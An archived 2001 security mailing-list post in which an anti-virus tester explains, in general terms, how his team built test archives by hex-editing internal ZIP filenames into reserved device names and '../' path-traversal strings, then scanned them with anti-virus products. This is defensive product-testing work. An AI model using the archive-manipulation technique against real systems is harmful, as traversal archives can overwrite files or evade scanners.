OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Andreas Marx (amarxgega-it.de)
Date: Fri Aug 03 2001 - 06:43:06 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi!

    >Its nice to hear that from U. I just want to know that what are the methods
    >and tools used by ur team for the testing the Anti-Virus
    >If u can send them to me, then i am very thankful to u

    We, the Anti-Virus Test Team at the University of Magdeburg (
    http://www.av-test.org ) did it the following way (I don't want to be too
    exact, because of the script kiddies, sorry):

    First we've created normal archives using a standard archivers (and normal
    file names like "xul.exe"), but after the archive was created, we have
    edited the files internally using a hex editor (change "x" to "n" - but be
    careful, in ZIP files the fine name is included twice). You cannot add
    names like "nul.exe" to an archive, of course, but you can change the name
    inside of the archives easily, if the length of the name will still be the
    same. You can do this for both "nul.exe" or for additional "../"'s for
    paths like "../../test.exe". (Btw, we have used the Volkow Commander (DOS),
    not a "real" hex editor. :) )

    Second step was to test the anti-virus and anti-trojan programs. This was
    relatively simple, because a few days ago we have just finished a bigger
    comparison test for trojaner-info.de, a big German security site (
    http://www.trojaner-info.de/test_07_2001.shtml ) with a special focus on
    trojan horses, backdoors etc. Additional tests were done using a slightly
    older test set of a review we did for the German PC-WELT magazine (
    http://www.pcwelt.de/ratgeber/anwendungen/viren-report/16583/3.html ). We
    can easily restore the original tested programs including updates, since
    we're using Ghost images for all types of tests. (This includes both the
    original test platforms, like "plain Win98", and a Ghost image where the av
    program was already installed.)

    The main test was relatively simply - simple scan the archives (for each of
    the tests we created at least four test files) and look what will happen.
    ;-) After this, we have repeated the test to ensure that all results were
    correct.

    I hope, this helps to understand the test procedures better.

    cheers,
    Andreas Marx

    NEW: Notes 4/5 + Exchange 5.5/2000 Test -> http://www.av-test.org 

    -- 
Andreas Marx <amarxgega-it.de>, http://www.av-test.de
GEGA IT-Solutions GbR, Klewitzstr. 7, 39112 Magdeburg, Germany
Tel: 0391/6075466, Mobil: 0177/6133033, Fax: 0391/6075469